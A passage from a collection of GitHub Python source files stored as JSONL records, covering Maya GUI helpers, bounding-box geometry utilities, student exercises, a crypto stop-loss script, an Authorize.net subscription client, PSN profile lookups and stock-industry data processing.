spinbox.setMaximum(max)\n if default:\n spinbox.setValue(default)\n\n\n horiz_layout.addWidget(spinbox)\n spinbox.setMinimumWidth(100)\n\n return spinbox\n\n\ndef add_populate_lineedit(label, parent_layout, callback=None, kwargs={}):\n \n horiz_layout = QtGui.QHBoxLayout()\n parent_layout.addLayout(horiz_layout)\n\n button = QtGui.QPushButton(label)\n button.setMinimumWidth(80)\n horiz_layout.addWidget(button)\n\n lineedit = QtGui.QLineEdit()\n horiz_layout.addWidget(lineedit)\n lineedit.setMinimumWidth(100)\n\n \n if callback is not None:\n \n kwargs['lineedit'] = lineedit\n button.clicked.connect(partial(callback, **kwargs))\n\n return lineedit","repo_name":"EriLee/petfactory_maya_scripts","sub_path":"petfactory/gui/simple_widget.py","file_name":"simple_widget.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"72271213287","text":"from typing import Optional, Tuple, Union\n\nimport numpy as np\nimport torch\n\nfrom cap.core.point_geometry import coor_transformation\n\n__all__ = [\n \"box_center_to_corner\",\n \"box_corner_to_center\",\n \"bbox_overlaps\",\n \"get_bev_bbox\",\n \"zoom_boxes\",\n]\n\n\ndef box_center_to_corner(\n bboxes: torch.Tensor,\n split: Optional[bool] = False,\n legacy_bbox: Optional[bool] = False,\n): # noqa: D205,D400\n \"\"\"\n Convert bounding box from center format (xcenter, ycenter,\n width, height) to corner format (x_low, y_low, x_high, y_high)\n\n Args:\n bboxes (torch.Tensor): Shape is (..., 4) represents bounding boxes.\n split: (:obj:`bool`, optional): Whether to split the final output to\n for (..., 1) tensors, or keep the (..., 4) original output.\n Default to False.\n legacy_bbox: (:obj:`bool`, optional): Whether the boxes are decoded\n in legacy manner (should add one to bottom or right coordinate\n before using) or not. Default to False.\n \"\"\"\n\n border = int(legacy_bbox)\n cx, cy, w, h = torch.split(bboxes, 1, dim=-1)\n x1 = cx - (w - border) * 0.5\n y1 = cy - (h - border) * 0.5\n x2 = x1 + w - border\n y2 = y1 + h - border\n\n if split:\n return x1, y1, x2, y2\n else:\n return torch.cat([x1, y1, x2, y2], dim=-1)\n\n\ndef box_corner_to_center(\n bboxes: torch.Tensor,\n split: Optional[bool] = False,\n legacy_bbox: Optional[bool] = False,\n): # noqa: D205,D400\n \"\"\"\n Convert bounding box from corner format (x_low, y_low, x_high, y_high)\n to center format (xcenter, ycenter, width, height)\n\n Args:\n bboxes (torch.Tensor): Shape is (..., 4) represents bounding boxes.\n split: (:obj:`bool`, optional): Whether to split the final output to\n for (..., 1) tensors, or keep the (..., 4) original output.\n Default to False.\n legacy_bbox: (:obj:`bool`, optional): Whether the boxes are decoded\n in legacy manner (should add one to bottom or right coordinate\n before using) or not. Default to False.\n \"\"\"\n\n border = int(legacy_bbox)\n x1, y1, x2, y2 = torch.split(bboxes, 1, dim=-1)\n width = x2 - x1 + border\n height = y2 - y1 + border\n cx = x1 + (width - border) * 0.5\n cy = y1 + (height - border) * 0.5\n\n if split:\n return cx, cy, width, height\n else:\n return torch.cat([cx, cy, width, height], dim=-1)\n\n\ndef bbox_overlaps(\n bboxes1: Union[torch.tensor, np.ndarray],\n bboxes2: Union[torch.tensor, np.ndarray],\n mode: Optional[str] = \"iou\",\n is_aligned: Optional[bool] = False,\n eps: Optional[float] = 1e-6,\n):\n \"\"\"\n Calculate overlap between two set of bboxes.\n\n Args:\n bboxes1 (Tensor or np.ndarray):\n shape (m, 4) in format or empty.\n bboxes2 (Tensor or np.ndarray):\n shape (n, 4) in format or empty.\n mode (str): \"iou\" (intersection over union), \"iof\" (intersection over\n foreground) or \"giou\" (generalized intersection over union).\n Default \"iou\".\n is_aligned (bool, optional): If True, then m and n must be equal.\n Default False.\n eps (float, optional): A value added to the denominator for numerical\n stability. Default 1e-6.\n\n Returns:\n Tensor: shape (m, n) if ``is_aligned `` is False else shape (m,)\n \"\"\"\n\n assert isinstance(bboxes1, type(bboxes2))\n is_ndarray = False\n if isinstance(bboxes1, np.ndarray):\n is_ndarray = True\n bboxes1 = torch.from_numpy(bboxes1)\n bboxes2 = torch.from_numpy(bboxes2)\n\n assert mode in [\"iou\", \"iof\", \"giou\"], f\"Unsupported mode {mode}\"\n # Either the boxes are empty or the length of boxes' last dimension is 4\n assert bboxes1.size(-1) == 4 or bboxes1.size(0) == 0\n assert bboxes2.size(-1) == 4 or bboxes2.size(0) == 0\n\n rows = bboxes1.size(0)\n cols = bboxes2.size(0)\n\n if is_aligned:\n assert rows == cols\n\n if rows * cols == 0:\n if is_aligned:\n return bboxes1.new_zeros((rows,))\n else:\n return bboxes1.new_zeros((rows, cols))\n\n area1 = (bboxes1[..., 2] - bboxes1[..., 0]) * (\n bboxes1[..., 3] - bboxes1[..., 1]\n )\n area2 = (bboxes2[..., 2] - bboxes2[..., 0]) * (\n bboxes2[..., 3] - bboxes2[..., 1]\n )\n\n if is_aligned:\n lt = torch.max(bboxes1[..., :2], bboxes2[..., :2]) # [rows, 2]\n rb = torch.min(bboxes1[..., 2:], bboxes2[..., 2:]) # [rows, 2]\n\n wh = (rb - lt).clamp(min=0)\n overlap = wh[..., 0] * wh[..., 1]\n\n if mode in [\"iou\", \"giou\"]:\n union = area1 + area2 - overlap\n else:\n union = area1\n if mode == \"giou\":\n enclosed_lt = torch.min(bboxes1[..., :2], bboxes2[..., :2])\n enclosed_rb = torch.max(bboxes1[..., 2:], bboxes2[..., 2:])\n else:\n lt = torch.max(\n bboxes1[:, None, :2], bboxes2[None, :, :2]\n ) # [rows, cols, 2]\n rb = torch.min(\n bboxes1[:, None, 2:], bboxes2[None, :, 2:]\n ) # [rows, cols, 2]\n wh = (rb - lt).clamp(min=0)\n overlap = wh[..., 0] * wh[..., 1]\n if mode in [\"iou\", \"giou\"]:\n union = area1[..., None] + area2[..., None, :] - overlap\n else:\n union = area1[..., None]\n if mode == \"giou\":\n enclosed_lt = torch.min(bboxes1[:, None, :2], bboxes2[None, :, :2])\n enclosed_rb = torch.max(bboxes1[:, None, 2:], bboxes2[None, :, 2:])\n\n eps = union.new_tensor([eps])\n union = torch.max(union, eps)\n ious = overlap / union\n if mode in [\"iou\", \"iof\"]:\n return ious if not is_ndarray else ious.numpy()\n # calculate gious\n enclose_wh = (enclosed_rb - enclosed_lt).clamp(min=0)\n enclose_area = enclose_wh[..., 0] * enclose_wh[..., 1]\n enclose_area = torch.max(enclose_area, eps)\n gious = ious - (enclose_area - union) / enclose_area\n return gious if not is_ndarray else gious.numpy()\n\n\n# =============================================================================\n# The following methods are mostly used in lidar 3d box processing.\n# =============================================================================\n\n\ndef corners_nd(\n dims: np.ndarray, origin: Union[Tuple[float, ...], float] = 0.5\n):\n \"\"\"Generate relative box corners based on length per dim and origin point.\n\n Args:\n dims (np.ndarray): [N, ndim] tensor. Box size in each dimension.\n origin ([Union[Tuple[float, ...], float]):\n origin point relative to the smallest point. Defaults to 0.5.\n\n Returns:\n corners (np.ndarray): [N, 2**ndim, ndim] sized tensor of corners.\n point layout example: (2d) x0y0, x0y1, x1y0, x1y1;\n (3d) x0y0z0, x0y0z1, x0y1z0, x0y1z1, x1y0z0, x1y0z1, x1y1z0, x1y1z1\n where x0 < x1, y0 < y1, z0 < z1\n \"\"\"\n ndim = int(dims.shape[1])\n corners_norm = np.stack(\n np.unravel_index(np.arange(2 ** ndim), [2] * ndim), axis=1\n ).astype(dims.dtype)\n # now corners_norm has format: (2d) x0y0, x0y1, x1y0, x1y1\n # (3d) x0y0z0, x0y0z1, x0y1z0, x0y1z1, x1y0z0, x1y0z1, x1y1z0, x1y1z1\n # so need to convert to a format which is convenient to do other computing.\n # for 2d boxes, format is clockwise start with minimum point\n # for 3d boxes, please draw lines by your hand.\n if ndim == 2:\n # generate clockwise box corners\n corners_norm = corners_norm[[0, 1, 3, 2]]\n elif ndim == 3:\n corners_norm = corners_norm[[0, 1, 3, 2, 4, 5, 7, 6]]\n corners_norm = corners_norm - np.array(origin, dtype=dims.dtype)\n corners = dims.reshape([-1, 1, ndim]) * corners_norm.reshape(\n [1, 2 ** ndim, ndim]\n )\n return corners\n\n\ndef rotation_2d(points: np.ndarray, angles: float):\n \"\"\"Rotate 2d points based on origin point clockwise when angle positive.\n\n Args:\n points (float array, shape=[N, point_size, 2]): points to be rotated.\n angles (float array, shape=[N]): rotation angle.\n\n Returns:\n float array: same shape as points\n \"\"\"\n rot_sin = np.sin(angles)\n rot_cos = np.cos(angles)\n rot_mat_T = np.stack([[rot_cos, -rot_sin], [rot_sin, rot_cos]])\n return np.einsum(\"aij,jka->aik\", points, rot_mat_T)\n\n\ndef center_to_corner_box2d(\n centers: np.ndarray,\n dims: np.ndarray,\n angles: Optional[np.ndarray] = None,\n origin: float = 0.5,\n):\n \"\"\"Convert Kitti-style locations, dimensions and angles to corners.\n\n format: center(xy), dims(xy), angles(clockwise when positive)\n\n Args:\n centers (float array, shape=[N, 2]): locations in kitti label file.\n dims (float array, shape=[N, 2]): dimensions in kitti label file.\n angles (float array, shape=[N]): rotation_y in kitti label file.\n\n Returns:\n np.ndarray: corner representation of boxes.\n \"\"\"\n # 'length' in kitti format is in x axis.\n # xyz(hwl)(kitti label file)<->xyz(lhw)(camera)<->z(-x)(-y)(wlh)(lidar)\n # center in kitti format is [0.5, 1.0, 0.5] in xyz.\n corners = corners_nd(dims, origin=origin)\n # corners: [N, 4, 2]\n if angles is not None:\n corners = rotation_2d(corners, angles)\n corners += centers.reshape([-1, 1, 2])\n return corners\n\n\ndef zoom_boxes(boxes: torch.Tensor, roi_wh_zoom_scale: Tuple[float, float]):\n \"\"\"Zoom boxes.\n\n Args:\n boxes: shape (m, 4) in format.\n roi_wh_zoom_scale: (w_scale, h_scale).\n\n Returns:\n torch.Tensor: zoomed bboxes.\n \"\"\"\n boxes = boxes[..., :4]\n boxes_w = boxes[..., 2] - boxes[..., 0]\n boxes_h = boxes[..., 3] - boxes[..., 1]\n\n w_bias = 0.5 * (roi_wh_zoom_scale[0] - 1) * boxes_w\n h_bias = 0.5 * (roi_wh_zoom_scale[1] - 1) * boxes_h\n\n return torch.stack(\n [\n boxes[..., 0] - w_bias,\n boxes[..., 1] - h_bias,\n boxes[..., 2] + w_bias,\n boxes[..., 3] + h_bias,\n ],\n dim=-1,\n )\n\n\ndef minmax_to_corner_2d(minmax_box: np.ndarray):\n \"\"\"Convert min-max representation of a box into corner representation.\n\n Args:\n minmax_box (np.ndarray): [N, 2*ndim] box. ndim indicates whether it is\n a 2-d box or a 3-d box.\n\n Returns:\n np.ndarray: corner representation of a boxes.\n \"\"\"\n ndim = minmax_box.shape[-1] // 2\n center = minmax_box[..., :ndim]\n dims = minmax_box[..., ndim:] - center\n return center_to_corner_box2d(center, dims, origin=0.0)\n\n\ndef get_bev_bbox(coordinate, size, yaw):\n\n size = np.clip(size, a_min=1, a_max=None)\n if len(coordinate) == 0:\n return np.zeros([0, 4, 2])\n\n corners = size / 2\n corners = np.stack(\n [\n corners,\n corners * np.array([1, -1]),\n corners * np.array([-1, -1]),\n corners * np.array([-1, 1]),\n ],\n axis=-2,\n )\n bev_bbox = coor_transformation(corners, yaw[:, None], coordinate[:, None])\n\n return bev_bbox\n","repo_name":"xingyun-xy/cap","sub_path":"cap/core/box_utils.py","file_name":"box_utils.py","file_ext":"py","file_size_in_byte":10989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7522849896","text":"#CTI-110\r\n#M3T1 - Areas of Rectangle\r\n#Oliver Hollis\r\n#11-09-2017\r\n#\r\n#Input the lenght and width of Rectangles\r\nrect_lenght1 = int(input('Enter the lenght of Rectangle 1: '))\r\nrect_width1 = int(input('Enter the lenght of Rectangle 1: '))\r\n\r\nrect_lenght2 = int(input('Enter the lenght of Rectangle 2: '))\r\nrect_width2 = int(input('Enter the lenght of Rectangle 2: '))\r\n\r\n# Caculate the Areas of the Rectangles\r\narea1 = rect_lenght1 * rect_width1\r\narea2 = rect_lenght2 * rect_width2\r\n\r\n# Determine which rectangle has a greater area\r\nif area1 > area2:\r\n print('Rectangle 1 has a greater area than Reactangle 2')\r\nelif area1 < area2:\r\n print('Rectangle 2 has a greater area than Reactangle 1')\r\nelse:\r\n print('Both have the same area')\r\n \r\n","repo_name":"holliso/cti110","sub_path":"M3T1_Areas_Rectangles_holliso.py","file_name":"M3T1_Areas_Rectangles_holliso.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21757512180","text":"import sys\nimport time\nimport traceback\n\nimport requests\n\nfrom library import stop_signal, sat, sell_limit_stop_loss, setup_logger, SellAsset, AccountHoldingZero\nfrom binance.client import Client as BinanceClient\n\nname = \"VRA\"\nstop_price_in_satoshi = 6.3\n\nstop_price = stop_price_in_satoshi * sat\n\nsell_asset_kucoin = SellAsset(\"kucoin\", name, stop_price, True, BinanceClient.KLINE_INTERVAL_5MINUTE)\n\nlogger = setup_logger(sell_asset_kucoin.name)\nlogger.info(\"Starting {} stop-loss maker on {}\".format(sell_asset_kucoin.market, sell_asset_kucoin.exchange))\nlogger.info(\"Stop price is set up to : {:.8f} BTC\".format(stop_price))\n\nwhile 1:\n try:\n stop = stop_signal(sell_asset_kucoin.exchange, sell_asset_kucoin.market, sell_asset_kucoin.ticker, stop_price, 4)\n if stop:\n sell_limit_stop_loss(sell_asset_kucoin.market, sell_asset_kucoin)\n logger.info(\"Stop-loss LIMIT order has been made on {}, exiting\".format(sell_asset_kucoin.exchange))\n sys.exit(0)\n time.sleep(40)\n except AccountHoldingZero as warn:\n logger.warning(warn)\n sys.exit(\"Exit\")\n except Exception as err:\n if isinstance(err, requests.exceptions.ConnectionError) or isinstance(err, requests.exceptions.ReadTimeout):\n logger.error(\"Connection problem...\")\n else:\n traceback.print_tb(err.__traceback__)\n logger.exception(err.__traceback__)","repo_name":"sroziewski/trading-bot","sub_path":"stop_loss_kucoin.py","file_name":"stop_loss_kucoin.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12165499376","text":"\"\"\"Utility functions for copying and archiving files and directory trees.\n\nXXX The functions here don't copy the resource fork or other metadata on Mac.\"\"\"\nimport shutil\n\n\ndef unpack(archive_path, path_to_unpack):\n \"\"\"Unpack archive to specified path.\"\"\"\n try:\n shutil.unpack_archive(archive_path, path_to_unpack)\n except ValueError:\n print('Not registered extension')\n","repo_name":"SiracencoSerghei/my-python-tasks","sub_path":"working_with_files/files_14_unzip.py","file_name":"files_14_unzip.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1495794653","text":"#coding:utf-8\n#data不包含name的\nclass StartRecording():\n name = \"camera._startPreview\"\n def __init__(self,stimime=None,stiwidth=None,stiheight=None,stimode=None,stiframerate=None,stibirate=None,\n orimime=None, oriwidth=None, oriheight=None,oriframerate=None,oribirate=None, saveori=None,logmode=None,\n audmime=None,audbitraite=None,samplerate=None,sampleformat=None,\n channellayout=None,timeenable=None,timeinterval=None,duration=None,fileoverride=None,\n storagepath=None,stabilization=None,**kw):\n\n self.data = {\"audio\": {\"channelLayout\": channellayout, \"bitrate\": audbitraite, \"samplerate\": samplerate,\"mime\": audmime, \"sampleFormat\": sampleformat},\n \"origin\": {\"mime\": orimime, \"width\": oriwidth,\"height\": oriheight,\"saveOrigin\": saveori,\"bitrate\":oribirate,\"framerate\":oriframerate,'logMode':logmode},\n 'storageSpeedTest':'false'}\n if(stimime and stiwidth and stiheight and stimode and stiframerate and stibirate):\n self.data['stiching']= {\"mime\": stimime, \"width\": stiwidth, \"height\": stiheight, \"mode\": stimode,\"framerate\":stiframerate,\"bitrate\":stibirate}\n if(timeenable and timeinterval):\n self.data['timelapse']={\"enable\":timeenable, \"interval\":timeinterval}\n if(duration):\n self.data['duration']=duration\n if (fileoverride):\n self.data['fileOverride'] = fileoverride\n if (storagepath):\n self.data['storagePath'] = storagepath\n if (stabilization):\n self.data['stabilization'] = stabilization\n\n for key, value in kw.items():\n '''\n if (key not in self.data['parameters']):\n self.data['parameters'][key] = value\n '''\n if (key not in self.data.keys()):\n self.data[key] = value\n\n def getJsonData(self):\n return self.data\n\nif __name__=='__main__':\n s=StartRecording(stimime='h265')","repo_name":"somesomeprincess/prointerface","sub_path":"model/StartRecording.py","file_name":"StartRecording.py","file_ext":"py","file_size_in_byte":2013,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"40117093053","text":"MENU = {\n \"espresso\": {\n \"ingredients\": {\n \"water\": 50,\n \"milk\": 0,\n \"coffee\": 18,\n },\n \"cost\": 1.5,\n },\n \"latte\": {\n \"ingredients\": {\n \"water\": 200,\n \"milk\": 150,\n \"coffee\": 24,\n },\n \"cost\": 2.5,\n },\n \"cappuccino\": {\n \"ingredients\": {\n \"water\": 250,\n \"milk\": 100,\n \"coffee\": 24,\n },\n \"cost\": 3.0,\n }\n}\n\nprofit = 0\nresources = {\n \"water\": 300,\n \"milk\": 200,\n \"coffee\": 100,\n}\n\n\ndef payment(MENU):\n \"\"\"ask the user to insert coin shows the actual amount and verify if is enough for the drink\"\"\"\n total_coins = 0\n quarter = 0.25\n dime = 0.10\n nikel = 0.05\n penny = 0.01\n price_product = MENU[\"cost\"]\n print(\"Please insert coins\")\n quarter_insert = int(input(\"How many quarters: \"))\n total_quarter = quarter_insert * quarter\n total_coins += total_quarter\n print(f\"The total insert is {total_coins}\")\n dime_insert = int(input(\"How many dimes: \"))\n total_dimes = dime_insert * dime\n total_coins += total_dimes\n print(f\"The total insert is {total_coins}\")\n nikel_insert = int(input(\"How many nikel: \"))\n total_nikel = nikel_insert * nikel\n total_coins += total_nikel\n print(f\"The total insert is {total_coins}\")\n penny_insert = int(input(\"How many penny: \"))\n total_penny = penny_insert * penny\n total_coins += total_penny\n print(f\"The total insert is {total_coins}\")\n if total_coins >= MENU[\"cost\"]:\n print(\"Here is your drink enjoy!!\")\n if total_coins > MENU[\"cost\"]:\n change = round(total_coins - MENU[\"cost\"], 2)\n print(f\"You're change : {change}\")\n profit = total_coins - change\n return profit\n else:\n print(f\"You insert {total_coins}, the prize is {price_product}\\n I give back your money\")\n profit = 0\n return profit\n\n\ndef resources_check(water, milk, coffee, MENU):\n \"\"\"Check if is enough ingredients in the coffee machine\"\"\"\n if water < MENU[\"ingredients\"][\"water\"]:\n print(\"Sorry there is not enough water\")\n check = False\n return check\n elif coffee < MENU[\"ingredients\"][\"coffee\"]:\n print(\"Sorry there is not enough coffee\")\n check = False\n return check\n elif milk < MENU[\"ingredients\"][\"milk\"]:\n print(\"Sorry there is not enough coffee\")\n check = False\n return check\n else:\n check = True\n return check\n\nwater = resources[\"water\"]\nmilk = resources[\"milk\"]\ncoffee = resources[\"coffee\"]\nmoney = 0\non = True\nwhile on:\n order = input(\"What do you like? espresso, latte, cappuccino,prize: \").lower()\n # TODO print the report\n\n if order == \"report\":\n print(f\"Water: {water}\\nMilk: {milk} \\nCoffee: {coffee}\\nMoney:$ {money}\")\n elif order == \"off\":\n on = False\n elif order == \"price\":\n print(\"Espresso price:$\", MENU[\"espresso\"][\"cost\"], \"\\n\", \"Latte price:$\", MENU[\"latte\"][\"cost\"], \"\\n\",\n \"Cappuccino price:$\", MENU[\"cappuccino\"][\"cost\"])\n elif order == \"espresso\":\n is_enough = resources_check(water, milk, coffee, MENU[\"espresso\"])\n if is_enough:\n water -= MENU[\"espresso\"][\"ingredients\"][\"water\"]\n coffee -= MENU[\"espresso\"][\"ingredients\"][\"coffee\"]\n money_es = payment(MENU[\"espresso\"])\n money += money_es\n elif order == \"latte\":\n is_enough = resources_check(water, milk, coffee, MENU[\"latte\"])\n if is_enough:\n water -= MENU[\"latte\"][\"ingredients\"][\"water\"]\n milk -= MENU[\"latte\"][\"ingredients\"][\"milk\"]\n coffee -= MENU[\"latte\"][\"ingredients\"][\"coffee\"]\n money_la = payment(MENU[\"latte\"])\n money += money_la\n elif order == \"cappuccino\":\n is_enough = resources_check(water, milk, coffee, MENU[\"cappuccino\"])\n if is_enough:\n water -= MENU[\"cappuccino\"][\"ingredients\"][\"water\"]\n milk -= MENU[\"cappuccino\"][\"ingredients\"][\"milk\"]\n coffee -= MENU[\"cappuccino\"][\"ingredients\"][\"coffee\"]\n money_cap = payment(MENU[\"cappuccino\"])\n money += money_cap\n\n\n","repo_name":"Vvollono/machine_coffee","sub_path":"coffee_machine_v1.0.py","file_name":"coffee_machine_v1.0.py","file_ext":"py","file_size_in_byte":4240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70560904808","text":"import apoc\nfrom skimage.io import imread, imsave\nfrom pathlib import Path\nimport numpy as np\n\n\ndef test_back_and_forth_feature_ordering():\n root = Path(apoc.__file__).parent\n img_path = str(root / '..' / 'demo' / 'blobs.tif')\n image = imread(img_path)\n\n img_path = str(root / '..' / 'demo' / 'annotations.tif')\n gt_image = imread(img_path)\n\n img_path = str(root / '..' / 'demo' / 'reference_labels.tif')\n ref_image = imread(img_path)\n\n feature_specs = \"original gaussian_blur=1 sobel_of_gaussian_blur=1\"\n\n classifier = apoc.ObjectSegmenter(positive_class_identifier=2, num_ensembles=100)\n classifier.train(feature_specs, gt_image, image)\n\n result1 = classifier.predict(image=image)\n\n feature_specs = \"sobel_of_gaussian_blur=1 gaussian_blur=1 original\"\n\n classifier = apoc.ObjectSegmenter(positive_class_identifier=2, num_ensembles=100)\n classifier.train(feature_specs, gt_image, image)\n\n result2 = classifier.predict(image=image)\n\n binary1 = result1 > 0\n binary2 = result2 > 0\n\n imsave(\"binary1.tif\", binary1)\n imsave(\"binary2.tif\", binary2)\n\n intersection = binary1 * binary2\n union = (binary1 + binary2) > 0\n\n jaccard_index = intersection.sum() / union.sum()\n\n print(jaccard_index)\n\n assert jaccard_index > 0.999\n\n\n","repo_name":"haesleinhuepf/apoc","sub_path":"tests/test_back_and_forth_feature_ordering.py","file_name":"test_back_and_forth_feature_ordering.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"53"} +{"seq_id":"29888171634","text":"import httplib\ntry:\n from xml.etree import ElementTree\nexcept ImportError:\n # Python < 2.5\n from elementtree import ElementTree\n\n# ARB expects request parameters in a particular order\nREQUEST_KEY_ORDER = (\"merchantAuthentication refId subscriptionId subscription name transactionKey \"\n \"paymentSchedule interval length unit \"\n \"startDate totalOccurrences trialOccurrences amount trialAmount \"\n \"payment creditCard cardNumber expirationDate cardCode bankAccount \"\n \"accountType routingNumber accountNumber nameOnAccount echeckType \"\n \"bankName order invoiceNumber description customer id email \"\n \"phoneNumber faxNumber billTo firstName lastName company address \"\n \"city state zip country shipTo\".split())\n\ndef arb_request_key_order(i):\n try:\n return REQUEST_KEY_ORDER.index(i[0])\n except ValueError:\n raise Exception('Unexpected ARB request key: %s' % i[0])\n\ndef xmlify_dict(d, indent=0):\n s = ''\n for k, v in sorted(d.items(), key=arb_request_key_order):\n if isinstance(v, dict):\n v = '\\n' + xmlify_dict(v, indent + 2) + ' ' * indent\n s += '%s<%s>%s\\n' % (' ' * indent, k, v, k)\n return s\n\ndef dictify_etree_node(node):\n d = {}\n for child in node:\n d[child.tag[child.tag.index('}') + 1:]] = dictify_etree_node(child)\n return d or node.text.strip()\n\nclass ARBConnection(object):\n\n def __init__(self, server, login, key, salt=None, timeout=None):\n self.server = server\n self.login = login\n self.salt = salt\n self.timeout = timeout\n self.key = key\n self.authentication = {\n 'name': self.login,\n 'transactionKey': self.key\n }\n\n def sendTransaction(self, method, **kw):\n kw['merchantAuthentication'] = self.authentication\n \n xml = \"\"\"\n<%s xmlns=\"AnetApi/xml/v1/schema/AnetApiSchema.xsd\">\n%s\n\n\"\"\" % (method, xmlify_dict(kw), method)\n \n if self.server.startswith('localhost:'):\n server, port = self.server.split(':')\n conn = httplib.HTTPConnection(server, port)\n else:\n conn = httplib.HTTPSConnection(self.server, timeout=self.timeout)\n conn.putrequest('POST', '/xml/v1/request.api')\n conn.putheader('content-type', 'text/xml')\n conn.putheader('content-length', len(xml))\n conn.endheaders()\n conn.send(xml)\n\n response = conn.getresponse().read()\n root = ElementTree.fromstring(response)\n result = dictify_etree_node(root)\n result['full_response'] = response\n return result\n\n\nclass ARBProcessor(object):\n def __init__(self, server, login, key, salt=None, timeout=None):\n self.connection = ARBConnection(server, login, key, salt, timeout)\n\n def create(self, **kw):\n if not isinstance(kw['subscription']['amount'], basestring):\n raise ValueError('Subscription amount must be a string')\n if not isinstance(kw['subscription'].get('trialAmount', ''), basestring):\n raise ValueError('Subscription trialAmount must be a string')\n\n return self.connection.sendTransaction('ARBCreateSubscriptionRequest', **kw)\n\n def update(self, **kw):\n return self.connection.sendTransaction('ARBUpdateSubscriptionRequest', **kw)\n\n def cancel(self, **kw):\n return self.connection.sendTransaction('ARBCancelSubscriptionRequest', **kw)\n","repo_name":"collective/getpaid.authorizedotnet","sub_path":"src/getpaid/authorizedotnet/subscription.py","file_name":"subscription.py","file_ext":"py","file_size_in_byte":3571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30616386964","text":"from psnawp_api import psnawp\nimport userInfo\nimport login\n\n# 유저 인스턴스 선언\nuserInfoInstance = userInfo.UserInfo(login.onlineID, login.npssoCode).GetPlayerInstance()\n\nuserProfile = userInfoInstance.profile()\n\n#print(userProfile)\n\n# 유저의 프로필 사진의 URL을 가져옴\ndef GetUserProfileImageURL():\n profileImageURL = userProfile['personalDetail']['profilePictures'][1]['url'] # size 'm'의 url을 가져옴\n\n return profileImageURL\n\n# 유저의 psn 이름을 가져옴\ndef GetUserProfileName():\n firstName = userProfile['personalDetail']['firstName']\n lastName = userProfile['personalDetail']['lastName']\n fullName = firstName + lastName\n\n return fullName\n\n# 유저의 총 트로피 개수를 가져옴\ndef GetUserProfileTrophies():\n trophySummary = userInfoInstance.GetTrophyProfileSummary()\n\n # 유저의 전체 트로피 개수를 트로피 별로 가져온다\n trophyCount_bronze = trophySummary['earnedTrophies']['bronze']\n trophyCount_silver = trophySummary['earnedTrophies']['silver']\n trophyCount_gold = trophySummary['earnedTrophies']['gold']\n trophyCount_platinum = trophySummary['earnedTrophies']['platinum']\n\n # 전체 트로피 개수\n trophyCount_total = trophyCount_bronze + trophyCount_silver + trophyCount_gold + trophyCount_platinum\n\n # 유저 트로피 정보를 딕셔너리 형태로 내보낸다\n userTrophyCountInfo = {\n 'bronze' : trophyCount_bronze,\n 'silver' : trophyCount_silver,\n 'gold' : trophyCount_gold,\n 'platinum' : trophyCount_platinum,\n 'total' : trophyCount_total\n }\n\n return userTrophyCountInfo\n\n# 유저의 프로필 레벨을 가져옴 (나중에 추가)\ndef GetUserProfileTrophyLevel():\n trophySummary = userInfoInstance.GetTrophyProfileSummary()\n \n return trophySummary['trophyLevel']","repo_name":"snwdaaa/PSAchivementManager","sub_path":"psam/src/getUserInfos.py","file_name":"getUserInfos.py","file_ext":"py","file_size_in_byte":1847,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"211572576","text":"\r\nimport os\r\nimport datetime as dt\r\nimport numpy as np\r\nimport pandas as pd\r\nimport scipy.io as scio\r\n\r\nfrom remotewind import w\r\n\r\n\r\n\r\n\r\n\r\ndef get_dict(dtype='change'):\r\n if dtype=='change':\r\n swChangeLevel1 = pd.read_csv(r'E:\\stocks_data\\sw_industry\\change_dict.csv', encoding='gbk')\r\n swChangeDict = {}\r\n for dumi in range(swChangeLevel1.shape[0]):\r\n if swChangeDict.get(swChangeLevel1['swName1Old'][dumi]) is None:\r\n swChangeDict[swChangeLevel1['swName1Old'][dumi]] = [swChangeLevel1['swName1New'][dumi]]\r\n else:\r\n swChangeDict[swChangeLevel1['swName1Old'][dumi]].append(swChangeLevel1['swName1New'][dumi])\r\n return swChangeDict\r\n else:\r\n swNameLevel1 = pd.read_csv(r'E:\\stocks_data\\sw_industry\\sw_dict_level1.csv', encoding='gbk')\r\n swNameCodeDict = {swNameLevel1['swName1'][dumi]: swNameLevel1['swCode1'][dumi] for dumi in range(swNameLevel1.shape[0])}\r\n swNameCodeDict[np.nan] = -1\r\n return swNameCodeDict\r\n\r\nclass CONSTATNS:\r\n LATEST = 20180709\r\n swNameCodeDict = get_dict(dtype='name')\r\n swChangeDict = get_dict(dtype='change')\r\n\r\n\r\ndef date_trans(tdt):\r\n if isinstance(tdt,str):\r\n return int(dt.datetime.strptime(tdt,'%Y/%m/%d').strftime('%Y%m%d'))\r\n elif np.isnan(tdt):\r\n return CONSTATNS.LATEST\r\n\r\ndef history_sw_data():\r\n lastData = pd.read_csv(r'E:\\stocks_data\\sw_industry\\sw_data\\sw_industry_20180709.csv',encoding='gbk')\r\n lastStks = lastData['stkcd'].values\r\n histData = pd.read_csv(r'.\\sw_history.csv',encoding='gbk')\r\n histData.columns = ['stkcd','exchg','stkname','standerd','indate','outdate','swName1','swName2','swName3','isnew']\r\n histData['stkcd'] = histData['stkcd'].map(lambda x:int(x))\r\n histData['indate'] = histData['indate'].map(date_trans)\r\n histData['outdate'] = histData['outdate'].map(date_trans)\r\n trdDates = scio.loadmat(r'E:\\bqfcts\\bqfcts\\data\\trddates.mat')['trddates'][:,0]\r\n stkInfo = scio.loadmat(r'E:\\bqfcts\\bqfcts\\data\\stkinfo.mat')['stkinfo'][:,[0,1,2]] # stkcd and ipo date\r\n stkInfo[:,2] = 